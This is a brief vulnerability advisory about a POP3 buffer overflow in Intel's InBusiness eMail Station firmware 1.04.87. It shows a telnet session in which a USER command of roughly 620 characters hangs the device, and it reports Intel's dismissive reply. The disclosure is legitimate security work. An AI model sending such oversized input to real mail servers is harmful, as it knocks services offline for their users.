COMMAND

    Intel InBusiness eMail Station

SYSTEMS AFFECTED

    Intel corporation 'InBusiness eMail Station' firmware version 1.04.87

PROBLEM

    Knud Erik Højgaard found a buffer overflow in the Intel InBusiness
    eMail Station, which can enable an attacker to execute a denial of
    service attack against it.

    Example:

        [foo@bar]$ telnet mailstation 110
        Trying mailstation...
        Connected to mailstation.
        Escape character is '^]'.
        +OK Pop server at mailstation starting. <2831812.972049732@mail>
        user [buffer]

    where [buffer] is appx. 620 chars of your own choice.(tried A  and
    %, expect all to work)

    The box(a nice  little piece of  hardware with built-in  harddrive
    and all) will stop responding, and needs a power cycle to  restore
    function.

SOLUTION

    Intel was contacted and informed of  the bug, and all they had  to
    say was "You're  using it in  a way its  not supposed to  be used"
    (Knud told them  it was on  a leased line)  - in their  opinion it
    doesn't matter since  its possible to  connect a modem  to it, and
    use it for retrieving mail and distributing it locally.